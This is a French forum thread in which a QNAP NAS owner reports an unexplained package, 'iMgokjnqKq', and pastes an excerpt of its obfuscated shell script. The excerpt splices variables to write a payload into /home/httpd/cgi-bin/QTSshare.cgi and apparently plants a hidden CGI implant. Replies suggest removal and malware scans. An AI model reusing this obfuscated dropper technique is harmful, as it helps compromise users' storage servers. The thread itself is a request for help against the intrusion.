QNAP QPKG inconnu : iMgokjnqKq

  • Vague de SPAM

    Suite à une vague de spam sur le forum, les inscriptions sont temporairement limitées.

    Après votre inscription, un membre de l'équipe devra valider votre compte avant qu'il ne soit activé. Nous sommes désolés pour la gêne occasionnée et vous remercions de votre patience.

Tryphon

Padawan
Membre Confirmé
1 Mars 2015
108
3
18
Bonjour,

Un truc m'affole. Je remarque seulement aujourd'hui un QPKG actif dans le centre d'applications : iMgokjnqKq 1.0.2
Il n'y a aucune description.
Une recherche sur l'internet ne donne aucun résultat.

En console ssh, dans .qpkg, il y a un répertoire du même nom qui ne contient qu'un seul fichier : pIFywOdFfXv.sh
il est exécutable, est daté du 12 septembre et pèse 4667 octets.

L'édition du fichier donne ceci (extrait) :

Code:
vEPHaAcRtoPF=/$pUeIffRdzudgJq$''home/h${maSNWcWG}t${UBByMy}tpd/cgi-bin/Q${DKbCSMk}TSs${jpOwVHI}${GhhMLA}har${UvyPQgFLQ}e.c${KixiYicuFiWT}gi
${VmflNOsuXb}${bjeYCREPIi}t$YyxzkB$''r ''"'"'KYzpd+EG(`N]UmWbH*ZkSa\nFRtj)w| \-e%!<CQcn$B{ufl>O&MhgTxs}i"Dry=;PXIvJAL#qoV' 'Voq#LAJvIXP;=yrD"i}sxTghM&O>lfu{B$ncQC<!%e\- |w)jtRF\naSkZ*HbWmU]N`(GE+dpzYK'"'"'' << "PZGdyGqGoYaU" > $vEPHaAcRtoPF
zQ/"He/Z

Mais qu'est-ce que c'est que ce truc ???????

Urgent!

Merci

TS-653, QTS 4.3.3
 
Mouais bizarre supprime le et installe MalwareRemover, ensuite une analyse poussé avec l'antivirus. Vérifie tes logs aussi au niveau des ip etc ...
 
Ah part quelques bricoles trouvées dans des spams (non ouverts bien sûr), rien n'a été trouvé par l'antivirus ou Malware Remover. C'était long de tout ratisser sur les 4 To de données sur le serveur!

Merci pour le conseil.